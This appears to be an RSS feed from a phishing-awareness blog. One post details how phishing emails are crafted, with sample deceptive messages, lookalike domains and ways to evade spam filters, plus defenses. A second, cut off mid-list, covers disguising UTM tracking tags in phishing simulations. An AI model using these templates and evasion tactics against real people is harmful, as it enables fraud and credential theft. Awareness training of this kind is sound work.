<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>phishandchips.io</title>
	<atom:link href="https://phishandchips.io/feed/" rel="self" type="application/rss+xml" />
	<link>https://phishandchips.io</link>
	<description>Discussing cybersecurity one byte at a time.</description>
	<lastBuildDate>Sun, 26 Oct 2025 00:46:31 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://phishandchips.io/wp-content/uploads/2023/09/cropped-phishandchips.io_-32x32.png</url>
	<title>phishandchips.io</title>
	<link>https://phishandchips.io</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">223541256</site>	<item>
		<title>Email Crafting: Designing Deceptive Messages That Mimic Trusted Sources</title>
		<link>https://phishandchips.io/email-crafting-designing-deceptive-messages-that-mimic-trusted-sources/</link>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Sun, 26 Oct 2025 00:46:31 +0000</pubDate>
				<category><![CDATA[Framework]]></category>
		<guid isPermaLink="false">https://phishandchips.io/email-crafting-designing-deceptive-messages-that-mimic-trusted-sources/</guid>

					<description><![CDATA[&#8212; title: &#8220;Email Crafting: Designing Deceptive Messages That Mimic Trusted Sources&#8221; category: &#8220;Framework&#8221; tags: [&#8220;Email Crafting&#8221;, &#8220;Social Engineering&#8221;, &#8220;Phishing&#8221;, &#8220;Pretexting&#8221;] status: &#8220;publish&#8221; excerpt: &#8220;The art and science of crafting convincing phishing emails that exploit trust, urgency, and human psychology to manipulate targets into taking harmful actions.&#8221; &#8212; # Email Crafting: Designing Deceptive Messages That Mimic [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>&#8212;<br />
title: &#8220;Email Crafting: Designing Deceptive Messages That Mimic Trusted Sources&#8221;<br />
category: &#8220;Framework&#8221;<br />
tags: [&#8220;Email Crafting&#8221;, &#8220;Social Engineering&#8221;, &#8220;Phishing&#8221;, &#8220;Pretexting&#8221;]<br />
status: &#8220;publish&#8221;<br />
excerpt: &#8220;The art and science of crafting convincing phishing emails that exploit trust, urgency, and human psychology to manipulate targets into taking harmful actions.&#8221;<br />
&#8212;</p>
<p># Email Crafting: Designing Deceptive Messages That Mimic Trusted Sources</p>
<p>## Introduction</p>
<p>Email crafting is the core skill in phishing attacks. It&#8217;s where reconnaissance data transforms into action, where psychological understanding meets technical execution, and where the success or failure of an entire campaign is determined. A well-crafted phishing email can bypass sophisticated technical controls by exploiting the one vulnerability present in every organization: human trust.</p>
<p>This phase combines social engineering principles, technical knowledge of email systems, and creative deception to create messages that recipients believe are legitimate. Understanding how attackers craft these messages is essential for recognizing and defending against them.</p>
<p>## The Anatomy of a Phishing Email</p>
<p>### 1. The Sender</p>
<p>**Display Name Manipulation:**</p>
<p>The &#8220;From&#8221; field is often the first thing recipients check, making it the most critical element to manipulate convincingly.</p>
<p>**Techniques:**<br />
&#8211; **Exact impersonation:** &#8220;IT Department <it@company.com>&#8221; using lookalike domains<br />
&#8211; **Authority spoofing:** &#8220;CEO John Smith <jsmith@company-secure.com>&#8221;<br />
&#8211; **Trusted brand abuse:** &#8220;PayPal Security <noreply@paypa1.com>&#8221; (note the &#8220;1&#8221; instead of &#8220;l&#8221;)<br />
&#8211; **Internal spoofing:** Exploiting misconfigured SPF/DMARC to appear internal</p>
<p>**Example:**<br />
> Instead of the real &#8220;support@microsoft.com&#8221;, attackers use:<br />
> &#8211; &#8220;support@micros0ft.com&#8221; (zero instead of &#8216;o&#8217;)<br />
> &#8211; &#8220;support@microsoft-security.com&#8221; (legitimate-looking subdomain)<br />
> &#8211; &#8220;Microsoft Support <support@mail-microsoft.com>&#8221;</p>
<p>### 2. The Subject Line</p>
<p>Subject lines must balance urgency with believability. Too alarming raises suspicion; too mundane gets ignored.</p>
<p>**Effective Subject Line Formulas:**</p>
<p>**Urgency-based:**<br />
&#8211; &#8220;URGENT: Your account will be suspended in 24 hours&#8221;<br />
&#8211; &#8220;Action Required: Unusual sign-in activity detected&#8221;<br />
&#8211; &#8220;Final Notice: Invoice #4851 overdue&#8221;</p>
<p>**Curiosity-based:**<br />
&#8211; &#8220;You&#8217;ve been mentioned in a document&#8221;<br />
&#8211; &#8220;Someone shared a file with you&#8221;<br />
&#8211; &#8220;Your package delivery failed&#8221;</p>
<p>**Authority-based:**<br />
&#8211; &#8220;IT Security Update Required &#8211; Mandatory&#8221;<br />
&#8211; &#8220;HR: Complete your annual compliance training&#8221;<br />
&#8211; &#8220;CEO: Q4 Performance Review Meeting&#8221;</p>
<p>**Familiarity-based:**<br />
&#8211; &#8220;RE: Meeting follow-up&#8221; (implies ongoing conversation)<br />
&#8211; &#8220;FW: Budget proposal for your review&#8221;<br />
&#8211; &#8220;Quick question about the project&#8221;</p>
<p>### 3. The Body Content</p>
<p>**Opening/Greeting:**</p>
<p>**Generic (bulk phishing):**<br />
&#8211; &#8220;Dear Customer,&#8221;<br />
&#8211; &#8220;Dear User,&#8221;<br />
&#8211; &#8220;Hello,&#8221;</p>
<p>**Personalized (spear phishing):**<br />
&#8211; &#8220;Hi Sarah,&#8221; (using researched first name)<br />
&#8211; &#8220;Good afternoon, Ms. Johnson,&#8221; (formal, using title and surname)<br />
&#8211; &#8220;Hey Mike,&#8221; (casual, matching organizational culture)</p>
<p>**The Hook:**</p>
<p>The body must quickly establish credibility and motivation for action:</p>
<p>**Problem/Threat Framework:**<br />
> &#8220;We&#8217;ve detected suspicious activity on your account from an IP address in Romania. For your security, we&#8217;ve temporarily limited your account access. Please verify your identity immediately to restore full functionality.&#8221;</p>
<p>**Opportunity Framework:**<br />
> &#8220;As a valued customer, you&#8217;ve been selected for our exclusive early access program. Click below to claim your benefits before they expire on Friday.&#8221;</p>
<p>**Authority Framework:**<br />
> &#8220;Per the directive from the CFO, all department heads must complete the attached expense reconciliation form by end of business today. Failure to comply may result in budget allocation delays.&#8221;</p>
<p>**Urgency Elements:**</p>
<p>Deadlines and consequences create pressure that reduces critical thinking:<br />
&#8211; &#8220;Your account will be closed within 24 hours unless&#8230;&#8221;<br />
&#8211; &#8220;This offer expires at midnight tonight&#8230;&#8221;<br />
&#8211; &#8220;Immediate action required to avoid penalties&#8230;&#8221;<br />
&#8211; &#8220;Limited spots available &#8211; first come, first served&#8230;&#8221;</p>
<p>**Trust Indicators:**</p>
<p>Attackers include elements that signal legitimacy:<br />
&#8211; Official-looking logos and branding<br />
&#8211; Legal disclaimers and privacy notices<br />
&#8211; Professional formatting and corporate templates<br />
&#8211; Security badges and verification symbols<br />
&#8211; Accurate company information (researched via OSINT)</p>
<p>### 4. The Call to Action (CTA)</p>
<p>The CTA directs the victim toward the attacker&#8217;s objective:</p>
<p>**Common CTAs:**</p>
<p>**Credential Harvesting:**<br />
&#8211; &#8220;Verify Your Account&#8221; → Links to fake login page<br />
&#8211; &#8220;Update Your Password&#8221; → Credential capture form<br />
&#8211; &#8220;Confirm Your Information&#8221; → Data collection page</p>
<p>**Malware Delivery:**<br />
&#8211; &#8220;Download Your Invoice&#8221; → Malicious attachment<br />
&#8211; &#8220;View Shared Document&#8221; → Weaponized file<br />
&#8211; &#8220;Install Security Update&#8221; → Malware installer</p>
<p>**Information Gathering:**<br />
&#8211; &#8220;Complete This Survey&#8221; → Reconnaissance questionnaire<br />
&#8211; &#8220;Update Your Profile&#8221; → Social engineering data collection<br />
&#8211; &#8220;Confirm Shipping Details&#8221; → Personal information theft</p>
<p>**Financial Fraud:**<br />
&#8211; &#8220;Process This Payment&#8221; → Wire transfer scam<br />
&#8211; &#8220;Update Payment Method&#8221; → Credit card harvesting<br />
&#8211; &#8220;Approve This Transaction&#8221; → Business email compromise</p>
<p>**Example Scenario:**</p>
<p>> **Subject:** IT Security: Mandatory Password Update Required<br />
><br />
> **From:** IT Security Team <security@company-internal.com><br />
><br />
> **Body:**<br />
> Dear Employee,<br />
><br />
> As part of our ongoing security improvements following the recent industry-wide cyberattack, all employees must update their passwords using our new secure password portal.<br />
><br />
> **You must complete this update by 5:00 PM today to maintain access to your account.**<br />
><br />
> Click here to update your password: [Update Password Now]<br />
><br />
> This is a mandatory security measure. Accounts that are not updated will be automatically locked for security purposes.<br />
><br />
> Thank you for your cooperation in keeping our company secure.<br />
><br />
> IT Security Team<br />
> Internal IT Department<br />
> Company Name | Protecting Your Digital Assets</p>
<p>This email combines multiple persuasion techniques:<br />
&#8211; Authority (IT Security Team)<br />
&#8211; Urgency (deadline today)<br />
&#8211; Fear (account will be locked)<br />
&#8211; Social proof (industry-wide cyberattack)<br />
&#8211; Legitimacy (professional formatting, security language)</p>
<p>## Email Crafting Techniques</p>
<p>### Pretexting</p>
<p>Creating a believable scenario that justifies the request:</p>
<p>**Common Pretexts:**<br />
&#8211; **IT emergencies:** System updates, security patches, account verification<br />
&#8211; **HR matters:** Benefits enrollment, policy updates, training requirements<br />
&#8211; **Financial urgency:** Vendor payments, invoice disputes, tax forms<br />
&#8211; **Executive requests:** Urgent tasks from leadership (CEO fraud)<br />
&#8211; **External events:** Tax season, holidays, industry conferences</p>
<p>### Personalization Strategies</p>
<p>**Basic Personalization:**<br />
&#8211; Using target&#8217;s real name<br />
&#8211; Referencing their job title or department<br />
&#8211; Mentioning their company name</p>
<p>**Advanced Personalization:**<br />
&#8211; Recent company news or events<br />
&#8211; Specific projects or initiatives<br />
&#8211; Known vendors or partners<br />
&#8211; Colleague names and relationships<br />
&#8211; Travel schedules or out-of-office periods<br />
&#8211; Recent purchases or activities</p>
<p>### Emotional Manipulation</p>
<p>**Fear:**<br />
&#8211; Account compromise warnings<br />
&#8211; Legal threats or compliance violations<br />
&#8211; Job security implications<br />
&#8211; Financial loss scenarios</p>
<p>**Greed:**<br />
&#8211; Exclusive offers or bonuses<br />
&#8211; Unexpected refunds<br />
&#8211; Prize winnings<br />
&#8211; Investment opportunities</p>
<p>**Curiosity:**<br />
&#8211; Mysterious shared documents<br />
&#8211; Unusual account activity (non-threatening)<br />
&#8211; Personal mentions or references<br />
&#8211; &#8220;Someone is trying to contact you&#8221;</p>
<p>**Obligation:**<br />
&#8211; Requests from authority figures<br />
&#8211; Helping a colleague in need<br />
&#8211; Completing required tasks<br />
&#8211; Reciprocating past favors</p>
<p>### Technical Crafting Elements</p>
<p>**HTML and Formatting:**<br />
&#8211; Professional templates matching legitimate emails<br />
&#8211; Proper logo usage and branding<br />
&#8211; Responsive design for mobile devices<br />
&#8211; Hidden text and misleading anchor links</p>
<p>**Link Obfuscation:**<br />
&#8211; **Display text mismatch:** Shows &#8220;https://paypal.com&#8221; but links to &#8220;http://paypa1.com&#8221;<br />
&#8211; **URL shorteners:** bit.ly, tinyurl hiding true destination<br />
&#8211; **Homograph attacks:** Using Unicode characters that look identical (e.g., Cyrillic &#8216;а&#8217; vs Latin &#8216;a&#8217;)<br />
&#8211; **Subdomain tricks:** &#8220;paypal.com.phishing-site.com&#8221; or &#8220;secure-paypal.com&#8221;</p>
<p>**Attachment Tactics:**<br />
&#8211; Familiar file types (PDF, DOCX, XLSX)<br />
&#8211; Convincing filenames: &#8220;Invoice_2024_Q4.pdf&#8221;<br />
&#8211; Double extensions: &#8220;report.pdf.exe&#8221; (hidden in Windows by default)<br />
&#8211; Macro-enabled documents: &#8220;Enable Editing to view this document&#8221;<br />
&#8211; ZIP password protection (to bypass email scanners)</p>
<p>## Anti-Detection Strategies</p>
<p>### Bypassing Email Filters</p>
<p>**Content Obfuscation:**<br />
&#8211; Replacing letters with numbers or symbols (l33t speak)<br />
&#8211; Using images instead of text<br />
&#8211; Breaking up suspicious keywords<br />
&#8211; Strategic misspellings</p>
<p>**Attachment Evasion:**<br />
&#8211; Password-protected archives<br />
&#8211; Steganography (hiding malware in images)<br />
&#8211; Using legitimate cloud storage links<br />
&#8211; Delayed execution malware</p>
<p>**Domain Reputation:**<br />
&#8211; Using newly registered domains<br />
&#8211; Compromising legitimate websites for hosting<br />
&#8211; Using free email providers with good reputation<br />
&#8211; Rotating through multiple sending domains</p>
<p>### Avoiding Spam Folders</p>
<p>**Technical Compliance:**<br />
&#8211; Proper email headers and authentication<br />
&#8211; Valid SPF, DKIM signatures (from compromised accounts)<br />
&#8211; Clean sender reputation<br />
&#8211; Avoiding spam trigger words</p>
<p>**Timing and Volume:**<br />
&#8211; Sending during business hours<br />
&#8211; Limiting send volume to avoid rate limiting<br />
&#8211; Spacing out attacks over time<br />
&#8211; Targeting specific time zones</p>
<p>## Defense and Detection</p>
<p>### For Individuals</p>
<p>**Verification Practices:**<br />
&#8211; **Hover before clicking:** Check actual URL destination<br />
&#8211; **Verify sender:** Contact sender through known channels<br />
&#8211; **Question urgency:** Legitimate requests rarely require instant action<br />
&#8211; **Check for personalization:** Generic greetings are red flags<br />
&#8211; **Look for errors:** Typos, grammar issues, formatting problems</p>
<p>**Technical Safeguards:**<br />
&#8211; Display full email headers<br />
&#8211; Use email clients that show actual URLs<br />
&#8211; Enable spam filtering and anti-phishing tools<br />
&#8211; Report suspicious emails to IT/security team</p>
<p>### For Organizations</p>
<p>**Email Security Controls:**<br />
&#8211; **SPF, DKIM, DMARC implementation:** Prevent sender spoofing<br />
&#8211; **Link wrapping and sandboxing:** Inspect URLs before delivery<br />
&#8211; **Attachment scanning:** Multiple anti-malware engines<br />
&#8211; **Banner warnings:** Flag external emails clearly<br />
&#8211; **URL rewriting:** Route clicks through security analysis</p>
<p>**Security Awareness Training:**<br />
&#8211; Regular phishing simulations<br />
&#8211; Real-world examples and analysis<br />
&#8211; Reporting procedures and encouragement<br />
&#8211; No-penalty reporting culture</p>
<p>**Technical Indicators:**<br />
&#8211; Emails with urgent calls to action<br />
&#8211; Requests for credentials or sensitive information<br />
&#8211; Unexpected attachments from unknown senders<br />
&#8211; Slight misspellings in domain names<br />
&#8211; Mismatched sender and reply-to addresses<br />
&#8211; Suspicious link destinations</p>
<p>## Red Flags in Phishing Emails</p>
<p>**Header Red Flags:**<br />
&#8211; Display name doesn&#8217;t match email address<br />
&#8211; &#8220;Reply-To&#8221; differs from &#8220;From&#8221; address<br />
&#8211; Unusual sending time (3 AM for local organization)<br />
&#8211; Multiple recipients in BCC</p>
<p>**Content Red Flags:**<br />
&#8211; Generic greetings (&#8220;Dear Customer&#8221;)<br />
&#8211; Spelling and grammar errors<br />
&#8211; Inconsistent branding or formatting<br />
&#8211; Threats or extreme urgency<br />
&#8211; Requests for sensitive information via email<br />
&#8211; Unsolicited attachments</p>
<p>**Technical Red Flags:**<br />
&#8211; HTTP instead of HTTPS in links<br />
&#8211; Shortened URLs or obfuscated links<br />
&#8211; Hover text doesn&#8217;t match visible text<br />
&#8211; Forms requesting passwords or SSN<br />
&#8211; Links to IP addresses instead of domain names</p>
<p>## The Evolution of Email Crafting</p>
<p>**Traditional Phishing (Early 2000s):**<br />
&#8211; Generic, mass-produced emails<br />
&#8211; Poor grammar and obvious errors<br />
&#8211; Crude impersonation attempts<br />
&#8211; Easy to spot and filter</p>
<p>**Modern Spear Phishing (Current):**<br />
&#8211; Highly personalized and researched<br />
&#8211; Professional quality and formatting<br />
&#8211; Context-aware and timely<br />
&#8211; Leverages real business processes<br />
&#8211; Exploits human relationships</p>
<p>**AI-Enhanced Crafting (Emerging):**<br />
&#8211; Natural language generation for perfect grammar<br />
&#8211; Personality matching and style mimicry<br />
&#8211; Real-time adaptation based on responses<br />
&#8211; Automated OSINT integration<br />
&#8211; Multi-language fluency</p>
<p>## Case Study: Business Email Compromise (BEC)</p>
<p>A finance manager receives an email:</p>
<p>**Subject:** URGENT: Wire Transfer Needed Today</p>
<p>**From:** CEO Sarah Chen <schen@company-exec.com></p>
<p>**Body:**<br />
> Hi Rebecca,<br />
><br />
> I&#8217;m currently meeting with potential investors and we need to move quickly on an acquisition opportunity that just came up. I need you to process a wire transfer for $250,000 to the following account today.<br />
><br />
> This is time-sensitive and confidential &#8211; please don&#8217;t discuss with anyone else until the announcement next week.<br />
><br />
> Account details:<br />
> [Account information]<br />
><br />
> Can you confirm once it&#8217;s sent? I&#8217;m in back-to-back meetings but checking email periodically.<br />
><br />
> Thanks,<br />
> Sarah</p>
<p>**Why this works:**<br />
&#8211; Authority (CEO request)<br />
&#8211; Urgency (time-sensitive)<br />
&#8211; Secrecy (don&#8217;t verify with others)<br />
&#8211; Plausibility (CEO traveling, acquisitions happen)<br />
&#8211; Pressure (waiting for confirmation)</p>
<p>**Red flags:**<br />
&#8211; Domain slightly off (company-exec vs company.com)<br />
&#8211; Request via email instead of established procedures<br />
&#8211; Unusual secrecy around financial transaction<br />
&#8211; Urgency prevents normal verification</p>
<p>## Related Concepts</p>
<p>&#8211; [Social Engineering](../glossary/social-engineering.md)<br />
&#8211; [Pretexting](../glossary/pretexting.md)<br />
&#8211; [Spear Phishing](../glossary/spear-phishing.md)<br />
&#8211; [Business Email Compromise](../glossary/business-email-compromise.md)<br />
&#8211; [Domain Spoofing](../glossary/domain-spoofing.md)</p>
<p>## References</p>
<p>&#8211; Anti-Phishing Working Group (APWG) &#8211; Phishing Activity Trends Reports<br />
&#8211; FBI Internet Crime Complaint Center (IC3) &#8211; BEC Statistics<br />
&#8211; NIST Special Publication 800-177: Trustworthy Email<br />
&#8211; Verizon Data Breach Investigations Report &#8211; Social Engineering Analysis<br />
&#8211; &#8220;Social Engineering: The Science of Human Hacking&#8221; by Christopher Hadnagy</p>
<p>&#8212;</p>
<p>**Educational Purpose:** This content is provided for awareness and defensive purposes. Understanding email crafting techniques helps individuals and organizations recognize and defend against phishing attacks.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">987</post-id>	</item>
		<item>
		<title>Understanding UTM Parameters</title>
		<link>https://phishandchips.io/understanding-utm-parameters/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 17:48:25 +0000</pubDate>
				<category><![CDATA[Campaign Management]]></category>
		<category><![CDATA[Payload Delivery]]></category>
		<category><![CDATA[Tips & Advice]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=977</guid>

					<description><![CDATA[A crucial yet often overlooked aspect of phishing campaigns is the use of UTM (Urchin Tracking Module) parameters. This blog post will delve into what UTM parameters are, how they can be leveraged in phishing campaigns, and why they are considered best practices for enhancing the effectiveness and value of your campaign. What are UTM [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>A crucial yet often overlooked aspect of phishing campaigns is the use of UTM (Urchin Tracking Module) parameters. This blog post will delve into what UTM parameters are, how they can be leveraged in phishing campaigns, and why they are considered best practices for enhancing the effectiveness and value of your campaign.</p>



<h3 class="wp-block-heading">What are UTM Parameters?</h3>



<p>UTM parameters are tags added to a URL that help track the performance of campaigns and content across the web. Originally developed by Urchin Software Corporation, which was later acquired by Google, UTM parameters are now a standard feature in Google Analytics and many other web analytics tools. These parameters allow marketers and analysts to understand the source, medium, campaign name, and other details about how users interact with a link.</p>



<p>A typical URL with UTM parameters might look like this:<br></p>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container html4strict blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="html4strict codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">https:<span style="color: #66cc66;">//</span>www.example.com?utm_source<span style="color: #66cc66;">=</span>newsletter&amp;utm_medium<span style="color: #66cc66;">=</span>email&amp;utm_campaign<span style="color: #66cc66;">=</span>spring_sale</div></div>




<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">Description</p>
</div>



<p>In this example:</p>



<ul class="wp-block-list">
<li>

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source=newsletter</div></div>

identifies the source of the traffic as a newsletter.</li>



<li>

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_medium=email</div></div>

indicates the medium through which the link was delivered.</li>



<li>

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign=spring_sale</div></div>

specifies the campaign associated with the link.</li>
</ul>



<p>By appending these parameters to URLs, organizations can gain granular insights into how different marketing efforts are performing.</p>



<h3 class="wp-block-heading">UTM Parameters in  Phishing Campaigns</h3>



<p>UTM parameters can significantly enhance your phishing campaign by providing detailed tracking and analytics, which are crucial for evaluating the effectiveness of the campaign and understanding user behavior.</p>



<p>Here’s how UTM parameters can be applied:</p>



<ol class="wp-block-list">
<li><strong>Tracking Email Opens and Clicks</strong>:
<ul class="wp-block-list">
<li>By embedding UTM parameters in the links within phishing emails, organizations can track how many recipients opened the email and clicked on the link. This data helps measure engagement and identify which messages are most compelling.</li>
</ul>
</li>



<li><strong>Segmenting User Interaction</strong>:
<ul class="wp-block-list">
<li>UTM parameters allow for segmentation of users based on their interaction with the phishing message. For example, different UTM tags can be used for various departments or job roles, enabling targeted analysis and reporting.</li>
</ul>
</li>



<li><strong>Assessing Campaign Effectiveness</strong>:
<ul class="wp-block-list">
<li>Detailed insights from UTM parameters help assess the overall effectiveness of the campaign. Organizations can analyze which types of phishing emails are more likely to deceive employees and tailor their training programs accordingly.</li>
</ul>
</li>



<li><strong>Providing Feedback and Metrics</strong>:
<ul class="wp-block-list">
<li>UTM parameters can also be used to provide personalized feedback to employees who interacted with the phishing email. For instance, those who clicked on the link can be directed to a landing page with educational content that explains the phishing attempt and offers tips for identifying such threats in the future.</li>
</ul>
</li>
</ol>



<h3 class="wp-block-heading">Best Practices for UTM </h3>



<p>To maximize the benefits of UTM parameters in phishing campaigns, it’s essential to follow best practices. Here are some key recommendations:</p>



<ol class="wp-block-list">
<li><strong>Define Clear Naming Conventions</strong>:
<ul class="wp-block-list">
<li>Establish a consistent naming convention for UTM parameters to ensure data is easily understandable and analyzable. For example, use

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source=internal</div></div>

instead of

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source=phishing_sim</div></div>

to avoid raising suspicion.</li>
</ul>
</li>



<li><strong>Use Subtle Campaign Names</strong>:
<ul class="wp-block-list">
<li>Campaign names (

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign</div></div>

) should be subtle and not give away the original nature of the message. Instead of

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign=phishing</div></div>

, use something less conspicuous like

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign=q3_update</div></div>

.</li>
</ul>
</li>



<li><strong>Segment by Target Audience</strong>:
<ul class="wp-block-list">
<li>Utilize UTM parameters to segment the audience by department, role, or other criteria. This segmentation helps tailor the analysis and training to specific groups. For instance,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_term=project_alpha</div></div>

can be used instead of a specific department name.</li>
</ul>
</li>



<li><strong>Incorporate Multiple Parameters</strong>:
<ul class="wp-block-list">
<li>Leverage multiple UTM parameters to capture comprehensive data. Combining

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source</div></div>

,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_medium</div></div>

,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign</div></div>

,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_term</div></div>

, and

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_content</div></div>

provides a detailed view of user interactions. For example,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_content=doc_link</div></div>

versus

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_content=profile_link</div></div>

can differentiate between multiple links within the same email without being overly descriptive.</li>
</ul>
</li>



<li><strong>Integrate with Analytics Tools</strong>:
<ul class="wp-block-list">
<li>Ensure that UTM-tagged URLs are integrated with your web analytics tools, such as Google Analytics. This integration allows for seamless tracking and reporting of campaign performance.</li>
</ul>
</li>



<li><strong>Educate and Inform</strong>:
<ul class="wp-block-list">
<li>Use the data gathered from UTM parameters to educate employees. Provide feedback on how many people interacted with the phishing email and use this information to reinforce training sessions. Highlight common mistakes and offer tips for identifying phishing attempts.</li>
</ul>
</li>
</ol>



<h3 class="wp-block-heading">Obfuscating UTM Parameters </h3>



<p>While UTM parameters are invaluable for tracking and analytics, they can also inadvertently reveal the nature of the message if not used discreetly. Here are strategies for obfuscating UTM parameters to ensure the phishing remains effective:</p>



<ol class="wp-block-list">
<li><strong>Use Generic Terms</strong>:
<ul class="wp-block-list">
<li>Avoid using terms that clearly indicate a phishing message. For instance, replace

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source=phishing</div></div>

with

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_source=internal_news</div></div>

.</li>
</ul>
</li>



<li><strong>Randomized or Code-Based Naming</strong>:
<ul class="wp-block-list">
<li>Use randomized strings or codes that don&#8217;t immediately suggest a phish. For example,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_campaign=abc123</div></div>

can be decoded internally to represent a specific campaign.</li>
</ul>
</li>



<li><strong>Contextual but Neutral Naming</strong>:
<ul class="wp-block-list">
<li>Utilize names that fit within the context of the organization’s regular communication but are neutral enough not to raise alarms. For instance,

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_medium=update_email</div></div>

instead of

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_medium=phish_email</div></div>

.</li>
</ul>
</li>



<li><strong>Consistent but Non-Descriptive Tags</strong>:
<ul class="wp-block-list">
<li>Maintain consistency in your naming conventions across different campaigns while keeping the tags non-descriptive. For example,

